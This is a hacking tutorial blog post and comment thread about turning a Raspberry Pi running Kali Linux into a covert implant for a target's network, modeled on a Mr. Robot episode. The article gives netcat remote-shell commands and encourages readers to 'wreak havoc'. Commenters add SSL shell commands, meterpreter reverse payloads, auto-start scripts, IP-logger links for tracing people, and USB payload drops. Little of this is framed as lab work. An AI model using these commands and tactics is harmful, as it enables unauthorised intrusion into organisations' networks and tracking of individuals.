Welcome back, my tenderfoot hackers!
A number of you have written me telling me how much you enjoy the Mr. Robot series on USA Network. I am also a huge fan! If you haven't seen it yet, you should. It may be the best show on TV right now.
Mr. Robot is about a young man with a social conscience (with severe social anxiety and a wicked morphine habit) who works in cyber security by day, protecting the network of Evil Corporation, while at night, is a hacker vigilante for good (does this scenario fit anyone we know?). Eventually, he gets recruited by a hacker organization known as fsociety (which looks and acts much like Anonymous) to bring down Evil Corporation.
One of the more interesting parts of the show, from my perspective, is that the hacking is realistic. No swirling, animated viruses like in so many other TV shows and movies, but rather good ole command line Linux.
The Hacking Raspberry Pi in Episode 4
In episode 4 ("eps1.3__da3m0ns.mp4"), Elliott, the main character, is planning on using a Raspberry Pi to control the heating system of the storage room where Evil Corp is storing their tape backups. If they can raise the temperature enough in the storage room, it will render those tape backups unusable.
On these tape backups are the records of 70% of the consumer debt in the world, including billions of dollars of student loans. The hackers believe that if they can destroy those records, millions of people will be free of their student loans and consumer debt held by Evil Corp.
In this tutorial, I will show you how to create a hacking Raspberry Pi (for those of you are unaware, a Raspberry Pi is a tiny, inexpensive, credit-card sized computer that is powerful) that can be controlled remotely, similar to what Elliott on Mr. Robot is about to use in this episode.
Step 1: Download the ARM Version of Kali
The first step, of course, is to download the ARM version of Kali. Raspberry Pi and many mobile devices use ARM CPUs as they are more energy efficient and cooler, so the Kali operating system must be compiled specifically for it.
Fortunately, the goods folks at Offensive Security have already done this for us. Navigate to Offensive Security's download page to get the Raspberry Pi file. Once you have downloaded the image, unzip it with WinRAR, WinZip, or any other archiving tool that can unzip files.
Step 2: Download & Install Win32 Disk Imager
Now we need to install the Win32 Disk Imager, which you can download from SourceForge. This tool enables us to write the image to an SD card or USB drive. I recommend a fast SD card of at least 4 GB. You can buy a 16 GB now for about 7 dollars.
Step 3: Run Disk Imager
Now that you have installed Disk Imager, right click on it and run it as "administrator."
Select the Kali image in the "Image File" window, direct the image to your SD card in the "Device" window, then click on the "Write" button. Be patient, this can take sometime.
If you using Linux, things are bit simpler. No need to download anything. You simply use the dd command (among other things, the dd command is used to create a disk image in digital forensics). If we assume the image is named Kali-RPI.img and the SD card is at /dev/sdc and we want it to copy in 512k block size (bs), then we simply need to type:
kali >dd if =Kali-RPI.img of = /dev/sdc bs=512k
Step 4: Install the SD Card in the Raspberry Pi
We need to remove the SD card from your PC and now install the SD card into our Raspberry Pi and boot it up. When it boots up, it takes you to a command line opening asking you for your username and password. Type in:
username: root
password: toor
Then type:
kali > startx
This starts the X11 GUI for Kali. Success! Now you have an tiny Kali hacking tool that can be placed anywhere!
Step 5: Start a Cryptcat Listener on Raspberry Pi
Now, that we have Raspberry Pi running Kali, we can place it anywhere within the Evil Corporation network. Raspberry Pi has an Ethernet connection and you can add a wireless adapter. The Raspberry Pi is so small it can be hidden in numerous places. These include inside a desktop computer, inside a telephone, clock, etc. without being noticed.
Once it is connected, we can start a Netcat listener (Netcat is built into Kali) on it by typing:
kali > nc -l -p6996 -e /bin/sh
This will enable Elliott to connect to a terminal on the Raspberry Pi from anywhere using port 6996.
Now, Elliott can connect back to the Raspberry Pi by using Netcat on his Kali system and typing:
kali > nc 192.168.1.105 6996
When he types ifconfig, he can see that he has a terminal on the Raspberry Pi ready to do some hacking of Evil Corp's HVAC system! Make certain to use the IP address of the Raspberry Pi in your environment.
Of course, there are other methods to connecting back to the Raspberry Pi. He could use SSH, and if he wanted a GUI, install the VNC Server and connect back to it with full GUI control over Kali. The problem with both of those methods is that they are more likely to be detected by Evil Corporation's perimeter network defenses.
Step 6: Wreak Havoc
Now that Elliott has a Kali installation within Evil Corporation's network, he should be able to use the multitude of tools available for wreaking havoc on Evil Corporation in Kali. In episode 4, he wants to control the HVAC system and turn up the heat to melt the backup tapes. He should be able to do that now that he has embedded Kali within Evil Corporation's network.
As this show progresses and Elliott demonstrates more hacks, I will try to keep you up on how he does them. Keep coming back, my greenhorn hackers, as I try to show you the hacks of Mr. Robot.
Just updated your iPhone to iOS 18? You'll find a ton of hot new features for some of your most-used Apple apps. Dive in and see for yourself:
70 Comments
Great article as always OTW! I have some money laying around, do you guys think I should get a Raspberry Pi and use it as a hacking device? :D
Obsrv_
Since its so inexpensive, I would say "Yes", but you may want to practice your hacking on a laptop or desktop before going to Raspberry Pi.
Awesome, I think I'll get one, thanks :D
Nice tutorial! I love the Mr Robot show and this is nice to have some insight onto a way he might be able to achieve this, really makes me love the show even more!
This is cool however requires him to be on the same network as the Pi this is using a bind tcp like connection listener, and just because something has strong encryption does not mean that it is secure. A more secure way of controlling it would be via a reverse meterpreter http payload. The Pi would likely be able to access the internet and even if the IDS had packet inspection, this traffic would look perfectly legitmate! Nice idea though :)
PRYOCC:
Good point, but since Elliott works in cyber security for Evil Corp., he is inside the network.
Came here to say this. Care to do a write up on the meterpreter side?
Metasploit is not in the RPI version of Kali by default.
Its just like all of the other meterpreter tutorials, except instead of choosing windows/meterpreter/reverse_tcp its windows/meterpreter/reverse_http(s). Https is a better choice because the traffic cannot be inspected as it is encrypted.
EDIT: If metasploit isn't in it, and it cannot be installed I am not sure
It can be installed. Just not there by default.
It can be installed, just a question of if you can run it. Kali ARM itself will be using at least 20MB ram, and you need about 600MB minimum to run metasploit comfortably. The RPI2 you could, but you be better of routing the traffic using something like Rhine Daemon.
How convenient, bought one yesterday.
Very entertaining! Please keep up this series.
Rofl xD Funny Coincidence, but the guys name is Malek. My first name spelled backwards is belak (Some similarities) and my Middle name is Dade. (Ever heard of the movie "Hackers"? "Dade" is the main guy. xD) So, It's quite fitting that I would get into things like this. lmao.
More Mr Robot tutorials please! Thank you :)
Think I'll watch the show first, then come back here.
I did the same thing. First read the top of article, then watched the show then came back here to read the full article.
Out of curiosity, after he is inside the system how would he control the heat? Would he just scan the network looking for devices that with a known port open and then determine the OS? Then after he found the device he'd use thc-hydra to crack the login details?
Remember, Elliott is on the cyber security team protecting Evil Corp, so he has inside information. So as a result, he probably won't need to scan and crack passwords.
If he were not on the inside, he could scan for IPs with port 80 open assuming that the HVAC system has an admin HTTP interface. Then, he would try the default passwords and if they don't work, progress to cracking the password. Then, he will have the admin interface and complete his goal of turning up the temperature in the area storing the tapes.
Oh yeah. I will have to start the series. I guess that I just assumed that he wouldn't be given the password to a sensitive area like that. So the only purpose of the Raspberry is to act as an entry point into the network?
Also, which network usb adapter (cant tell which one is used in the picture) would you recommend for the RP? Anyone have experience with the Edimax EW-7811Un?
Edimax EW-7811Un is very famous here and is part of several raspberry starter bundles.
Basically it works well. You have to be careful with power management, but I guess that holds for each adapter. I managed it with a simple modprobe option.
The chipset is RTL8188CUS. I think it's not directly on the list of aircrack-ng, but as far as I got with hacking (monitoring, dumping) it works fine. Don't know about AP feature. Haven't tried it yet but will find out soon.
No problems on a raspberry pi so far, just some strange behavior when used inside a VirtualBox running on the Mac - suddenly it freezes after some wlan monitoring etc. action; but I'm not sure if it's the adapter, the adapter on the Mac or the VBox.
(Author of the article, you should probably TEST this yourself before writing a guide on how to do it)
Some tips for anyone who actually want to try to do this. First, all of the steps up to where you start cryptcat should be followed. Everything there is solid info. However, once you get to the command line to run cryptcat you'll notice that nothing happens. That because although cryptcat comes installed on the full version of kali, it's not included on the stripped down rpi version. So, we'll need to install it.
Then comes problem number 2. Even if we try to execute a command to install cryptcat you'll notice that the install fails. In order to remedy this we'll need to update our sources. But wait, it gets better.
Problem 3. If we try to update kali using the apt-get command you'll notice that the update fails to complete reading the packages we download due to this raspberry pi image of kali having too old of a keyring. So, we'll have to update that before we can make any changes.
To update, enter the following code one line at a time:
rm -rf /var/lib/apt/lists
apt-get update
apt-get install kali-archive-keyring
If you get a message letting you know that your keyring is already the newest version after you type the last line then congrats! We're almost there.
Run:
apt-get update
And let it complete. Then, to install cryptcat, run:
apt-get install cryptcat
This will now successfully install cryptcat to your rpi build of kali and you can continue on your dubious ways.
Good guide OP, I just recommend you test these instructions yourself from scratch as your readers will to make the process easier for learning hackers.
When I do this I get a connection refused. I used 'ncat -l -p 443 --ssl -e /bin/bash' on the pi and 'ncat 127.0.0.1 443 --ssl' on my kali machine on my laptop. Does anyone know why?
Thanks for that supplemental material!
Not a problem. You might also want to revise your suggestion to use cryptcat as it's only useful as an encrypted chatting service. There's no way to bind a remote shell like you can on netcat, it's older brother, so there's not much "hacking" you can really do.
Thanks. I'll make the revisions.
No problem. You'll want them to use ncat as opposed to netcat though. It is bundled with kali and can provide ssl encryption. Netcat sends commands in the clear so not good for real life scenarios, while ncat has a variety of encryption options. We'll stick to ssl. To use use ncat to setup a reverse shell on the pi you'll want to use the following commands:
Victim Side: ncat -l -p 443 --ssl -e /bin/bash
Attacker Side: ncat IP Address 443 --ssl
That'll give you the desired effect. However, this will only work locally, I'll leave it up to you to determine how to execute this remotely. Cheers.
Any thoughts here? Can you explain why cryptcat wouldn't allow you to get a shell?
Cryptcat does not support the ability to execute programs like ncat does. From what I've gathered it's mainly used as an encrypted chat client. However, with ncat you can not only bind a terminal window using the -e command (-e /bin/bash), you can also transfer files between the machines without the need of a separate client.
Tape it on a drone.. and watch the fun!! Haha ;);)
By reading your great article , I got motivated to be like Elliot !
Great! I sure like him!
It would be better to use an Android smartphone to do this...
How so?
No.. you risk losing it... and your android being much costlier than pi.. no point ;);)
OTW, I just wanted to express my gratitude towards you for showing me this series. Unfortunately, it doesn't air over here (Pretty self-explanatory), but why should that stop me? I can't wait for the 29th when the new episode airs.
Once again: Thanks a hell of a lot! This series is great. Could hardly be better. Can I hug you? ;)
You are welcome!
Glad you like the show and this series. There is more coming soon.
I have a small question, Disregarding this post. As many of your tutorials are Website based, I have a question. Can you trace an IP address from a Youtube, Or google+ Profile? Sorry if this is stupid. I know of client side attacks, But Most have been fixed by updates to the software. I really Want to know, but I'm fine if not, Because I do this on virtual machines.
You can send them a message containing a ip logger link. (or hack into googles servers, good luck)
Now that I have my PI all setup I have a few more questions.
On step #4 you said that after it boots up you login. So we attach it to a monitor via HDMI and plugin a usb keyboard?
Is there any way to have it automatically login, connect an open network, and start a ncat reverse shell? Does this script already exist?
Otherwise, the minute power is cut to the RPI (while transporting it for instance) it would reset and upon rebooting it would be stuck at the login step and without a keyboard and screen it would be hard to configure it from there.
I was wondering that too so I just made a simple shell script that runs at boot to do all the commands. I am pretty new to this so I wonder if there is a more efficent way to do it?
I'm a beginner at this and was just wondering how you would set up a script to run from startup. Also if you set this up at home and transported it without the screen and keyboard, how would you be able to connect it to the WiFi network?
Can you do a how-to on the new Mr.Robot episode where he tries to access the prison computer remotely through a usb?
That one seems pretty basic. You can do it with metasploit. Just use a reverse-tcp payload and put in your public ip. Forward that port to your box. Put the file on a usb and hope someone opens it
Great article. otw, I'm going to start watching the series. And guess what, I am always running kali on my pi! I think it is suitable because of the portabilty.
thank you bro
If I were to do this and planned to leave the Pi in place for longer periods of time would I need a battery? If so what battery would you recommend that would be small and discreet but still provide a reasonable amount of battery life? Great tutorial by the way!
On the show, he hard wires the Pi directly into the electrical system of the HVAC system. Since its a 100v device, I wouldn't recommend a battery.
If I didn't have access to a wall power source and wanted to be able to drop a Pi in and out of a place without having to plug it in what would you suggest for power supply?
What OTW means, is that Elliott spliced the Pi directly into the power system. In other words, Elliott took the power wires from the inside of something, cut them, and rigged them up to the Raspberry Pi.
I realize that, but what i'm asking is if I can't take apart things to steal power from them would I be able to keep it portable. Maybe by using a power bank or something of the sort so that I could essentially hide my pi in a box and just drop it somewhere in the target company or whatever for a few days without running out of power. Then I or someone would come pick it up without having to unhook it from a panel or something.
You might be able to get a few hours out of it, or maybe even one day, but days aren't going to work unfortunately.
thought, where the hell did he get a network cable for the pi ? would it be better to have a gsm module instead?
There are a lot of possibilities that are not clearly defined in the show. He patched into the HVAC system, so maybe he got a network connection there as well.
Might also work.
My first idea was adding an additional wifi adapter to the pi and connect to it directly, then via ethernet into the network. No need for nc then, right? However he needs to be somehow nearby (depending on the wifi adapter used) which can be a problem, especially in the area where he placed the pi.
However this could also be a problem for gsm connection.
Great article as always! Thx for that.
I'm curious however, what it is for (maybe it will be clear in the last episode)?
Elliot wants to blow up the heating.
He installs the pi somewhere around it and connects to the network (via cable or Wi-fi? I'm not sure). All I saw was that he wired power supply for the pi. No extra GPIO connection which could be used to control some hardware. So all the hacking will be done via net (maybe SCADA etc.?).
Now: to access the pi he needs to be in the same network, otherwise he can't reach the ip/port. So anything he can do from the pi could(!) be done from wherever he connects to it, right? So why the pi?
Or is it just to not being traced back to his workstation?
Maybe I just oversee something in here, but I want to understand.
First, Elliot is not blowing up the heating system, simply turning up the temperature high enough to render the tapes unusable.
The Pi is a hacking system. Now that he has an entry point into the network, he can hack what ever needs within the system, presumably a PLC controller for the heating system.
Thx for the quick reply.
Sure, I used the wrong words. Sorry for that.
So it means that he installed the pi "just" to have a (in this case) kali system in the network that he can control what his normal workstation, from where he would connect to it, does not provide?
Hello! Thanks for the great tutorial!
I am experiencing some difficulties, however. I'm attempting to re-use an old VGA monitor, at least temporarily. I've got a cheap HDMI-VGA cable, which I have tested with a laptop and verified that both the cable and my monitor do work. I also got the Pi to work with this setup running Raspbian. I did have to change some values in /boot/config.txt to make it work with the cable. But when I boot the Pi into Kali, the screen remains blank, and I can't even find config.txt...
What should I do?
Never mind, I figured it out. For anyone who has similar difficulties, my solution was to create a file called config.txt in on the SD card in the FAT partition and put this in it:
hdmi_drive=2
config_hdmi_boost=4
hdmi_group=1
hdmi_force_hotplug=1
i found this ebook, thought might be useful for this article, it's called Raspberry Pi for Secret Agents here's the link to download:
http://filepi.com/i/qtu5fSd
i like this one , its serious method
thanks for this man
can we hack another pi on the same network if we know its ip address and its password format?
Awesome tutorial, very interesting.
Although I have a few question I require you guys expertise on:
Thank you for your insight on this matter, and once again congratulations on the great job. Not just this tutorial but everything you've being teaching us. xD
Maybe using a socksproxy?
or using something like remote.it
Great article OTW! Lot's of good information's.
For the starters like me, I found this book(Ebook) few days ago, and helped me to setup my Raspberry PI with Kali.
Penetration Testing with Raspberry Pi - Second Edition
By: Michael McPhee; Jason Beltrame
Publisher: Packt Publishing
Pub. Date: November 30, 2016
Web ISBN-13: 978-1-78712-623-7
Print ISBN-13: 978-1-78712-613-8
Pages in Print Edition: 316
Hey Occupytheweb, nice to see these tuts. I wondered a litte during the series if all these hacks could really happen. Now I see: Yes they can. Thanks for this!
But I got a question with this raspberry thing. Where did the hacking pi connect with the evil corp network? May be I overlooked that, but I scrolled back and forth and so on ;o) I did not see it. Thanks so far, you are great!
Excellent tutorial. I am glad I joined this site and learning alot. A couple of questions though not directly related to this tutorial.
Any thoughts on above ??
Thanks
D
If you know this you can hack 8/10 company's xD
This was really helpful. I've been trying to setup my RPi with DHCP on my laptop and could never get it right.
is this the like windows/meterpreter/reverse_tcp?
Share Your Thoughts